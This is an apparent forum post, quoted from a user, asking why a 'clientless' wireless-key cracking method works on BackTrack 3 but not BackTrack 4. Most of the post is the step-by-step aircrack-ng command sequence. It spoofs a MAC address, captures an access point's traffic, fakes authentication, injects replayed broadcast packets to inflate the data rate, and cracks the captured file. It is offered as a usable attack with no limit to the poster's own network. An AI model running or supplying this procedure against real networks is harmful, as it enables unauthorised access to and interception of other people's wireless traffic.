
Originally Posted by
brawngp
Right i just tested this method on BACKTRACK 3 and it works great!! at least 500ps data. why doesnt this method work with Backtrack 4? Data rate on backtrack 4 does not increase, only 1 or 2. Both ways where clientless using this same method.
Can someone test this clientless method on BACKTRACK 4 using card stated aove and tell me if the data rate increases?
airmon-ng stop wlan0
ifconfig wlan0 down
macchanger --mac 00:11:22:33:44:55 wlan0
airmon-ng start wlan0
airodump-ng wlan0
airodump-ng -c (channel ap is on) -w test --bssid (bssid of AP) wlan0
aireplay-ng -1 0 -a (bssid of Ap) -h 00:11:22:33:44:55 wlan0
aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b (bssid of Ap) -h 00:11:22:33:44:55 wlan0
aircrack-ng test-01.cap
cheers.